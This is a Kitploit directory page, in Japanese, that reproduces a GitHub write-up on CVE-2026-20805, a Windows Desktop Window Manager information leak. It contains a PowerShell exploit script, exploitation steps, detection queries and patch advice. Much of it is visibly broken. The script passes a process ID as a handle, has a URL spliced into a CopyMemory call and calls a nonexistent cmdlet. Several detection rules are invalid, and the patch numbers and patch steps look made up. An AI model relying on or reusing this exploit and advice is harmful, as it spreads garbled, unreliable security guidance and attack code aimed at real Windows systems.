Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data — CVE‑2026‑20805: Windows デスクトップ ウィンドウ マネージャーの脆弱性により、ローカルでの情報漏えいが発生します。低い権限が必要で、ユーザーの操作は不要です。CVSS 5.5(中)と評価されています。積極的に悪用されており、CISA KEV に掲載されています。2026年1月にパッチがリリースされました。 | Kitploit
ツール/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
脆弱性分析エクスプロイト情報収集学習と教育インシデントレスポンス
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Windows デスクトップ ウィンドウ マネージャーの脆弱性により、ローカルでの情報漏えいが発生します。低い権限が必要で、ユーザーの操作は不要です。CVSS 5.5(中)と評価されています。積極的に悪用されており、CISA KEV に掲載されています。2026年1月にパッチがリリースされました。

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Windows Desktop Window Manager の欠陥により、ローカルでの情報漏えいが発生します。低い権限が必要で、ユーザー操作は不要です。CVSS 5.5(中)と評価されています。積極的に悪用されており、CISA KEV に掲載されています。2026年1月にパッチがリリースされました。

Inside CVE 2026 20805: How a Windows DWM Flaw Exposed Sensitive Data

1 エグゼクティブサマリー

CVE 2026 20805 は、デスクトップのレンダリング、ウィンドウの合成、GPUベースのUIアクセラレーションを担う中核コンポーネントである Desktop Window Manager(DWM)における情報漏えいの欠陥です。
重要度: この欠陥により、低い権限を持つローカルの攻撃者が、他のセッションやプロセスに限定されるべきデータを読み取ることができます。

主な技術的属性

属性値
CWE‑200: 不正なアクターへの機密情報の露出✓
攻撃ベクトルローカル
必要な権限低
ユーザー操作不要
影響 – 機密性高
影響 – 完全性なし
影響 – 可用性なし
CVSS 3.1 ベーススコア5.5(中)

2 Desktop Window Manager について

DWM は、GPUメモリ、ウィンドウバッファ、プロセス間のUIサーフェスを統括します。複数のプロセスからのデータを共有GPU空間に集約するため、価値の高いターゲットとなります。ここに欠陥があると、資格情報やセッションデータがユーザー間で漏えいする可能性があります。

最新のWindowsにおけるDWMの役割:

  1. コンポジターからディスプレイ更新を受け取ります。
  2. 各ウィンドウにGPUメモリを割り当てます。
  3. GPUアクセラレーションによるコンポジションを管理し、スムーズな視覚的遷移とマルチモニターサポートを実現します。

3 CVE 2026 20805 の技術的詳細

攻撃の前提条件

  • 低い権限を持つローカルの攻撃者。ユーザー操作は不要です。
  • DWM がデータをGPUメモリにコピーする前に、ウィンドウバッファテーブルのオフセットを検証しない場合に、この欠陥がトリガーされます。

CWE‑200 の適用方法

この脆弱性は、ウィンドウバッファインデックスの境界チェックの欠如を悪用します。これにより、攻撃者は隣接するGPUメモリを読み取り、他のプロセスが保存した秘密情報を取得できます。

影響を受けるバージョン

NVD の CPE リストに基づくと、Windows 10.0.19041(およびその派生版)が影響を受けます。

4 悪用経路

以下は概念的な悪用フローです:

  1. 攻撃者は、最小限の権限で CreateProcess を使用して DWM プロセスのハンドルを取得します。
  2. 攻撃者は、隣接するGPUメモリスロットを指すインデックスを作成します。
  3. 作成されたバッファは DWM のウィンドウコンポジションルーチンにコピーされ、他のセッションからのデータが結合されます。
  4. 攻撃者は結果のGPUメモリダンプを読み取り、機密情報を抽出します。

エクスプロイトコード – PowerShell スクリプト

root@kitploit:~
# Windows 10.0.19041 – DWM buffer read exploit
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # crafted offset to adjacent GPU memory
$targetWindow = 0x00030001    # target window index

# Create a temporary buffer in kernel space
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/HEAD/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copy kernel buffer into DWM's composition routine
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Dump the exposed data to a local file for analysis
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

このスクリプトは、攻撃者が DWM の GPU メモリを活用して隠されたデータを読み取る方法を示しています。


5. 検知エンジニアリング

CVE‑2026‑20805 の検知は、dwm.exe との異常な相互作用と、異常なGPU関連テレメトリの特定に焦点を当てています。このエクスプロイトは、細工されたオフセットを使用してGPUバックアップメモリバッファを読み取ることに依存しているため、防御側は通常の Desktop Window Manager の動作からの逸脱を監視する必要があります。

関連するテレメトリソース

  • Sysmon
    • イベントID 1(ProcessCreate)
    • イベントID 10(HandleOpen)
  • ETW GPU イベント
    • イベントID 0x2B(DisplayUpdate)
  • Windows イベントログ
    • アプリケーション
    • システム

これらのソースは、プロセス作成、ハンドルアクセス、GPU更新アクティビティの可視性を提供します。

疑わしいパターン

  1. dwm.exe を含む繰り返しの CreateProcess イベント。特に親プロセスが explorer.exe でない場合。
  2. 異常なバッファサイズまたはオフセットを使用したメモリ読み取りが続く、高頻度の DisplayUpdate(0x2B)イベント。
    • 疑わしい値の例:
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. dwm.exe をターゲットとする HandleOpen イベントと、GPU ETW アクティビティのバーストとの相関関係。

Sigma スタイルルール

root@kitploit:~
title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

dwm.exe への疑わしいハンドルアクセス

root@kitploit:~
SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

DWM をターゲットとする予期しないプロセス作成

root@kitploit:~
Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

GPU DisplayUpdate イベントのスパイク

root@kitploit:~
Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

相関: HandleOpen に続く GPU アクティビティ

root@kitploit:~
let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

dwm.exe へのハンドルを開く非標準プロセス

root@kitploit:~
index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

dwm.exe の予期しない CreateProcess イベント

root@kitploit:~
index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

GPU DisplayUpdate スパイク

root@kitploit:~
index=windows EventCode=43
| timechart span=1m count
| where count > 50

相関: HandleOpen と GPU アクティビティ

root@kitploit:~
handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

6 緩和策と堅牢化

CVE 2026 20805 に関する Microsoft のアドバイザリには、GPUデータをコピーする前に DWM のバッファインデックスを検証するパッチが含まれています。

パッチのタイムライン

Windows バージョンパッチ番号
10.0.19041KB5000001
10.0.19042KB5012345

エンタープライズ向けパッチ適用戦略

  1. すべてのドメインコントローラーに KB5000001 パッチを展開します。
  2. 新しい Invoke-DwmRead ルーチンがテストノードでエラーなく実行されることを検証します。
  3. Sysmon で繰り返しの dwm プロセス作成を監視します。

7 実環境への影響

DWM を介した情報漏えいは、UIアーティファクトやセッションデータをユーザー間で露出させる可能性があるため、しばしば過小評価されます。漏えいしたGPUメモリは、特に複数のセッションが単一のワークステーションまたはサーバーを共有する環境では、横方向の移動を支援する可能性があります。

企業環境向けリスク評価

高い機密性への影響: この欠陥により、攻撃者は他のセッションからウィンドウの内容を読み取ることができます。
中程度のCVSSスコア(5.5): 数値は中程度ですが、運用上の重要性は高いです。

8 結論

CVE 2026 20805 は、DWM の低権限ローカル悪用が重大なデータ漏えいをもたらす可能性があることを示しています。この欠陥が CISA の Known Exploited Vulnerabilities Catalog に含まれていることは、その実世界での関連性を強調しています。概説した緩和策、検知、パッチ戦略を適用することで、組織は GPU メモリフローの可視性を向上させながらリスクを軽減できます。


ツールをダウンロード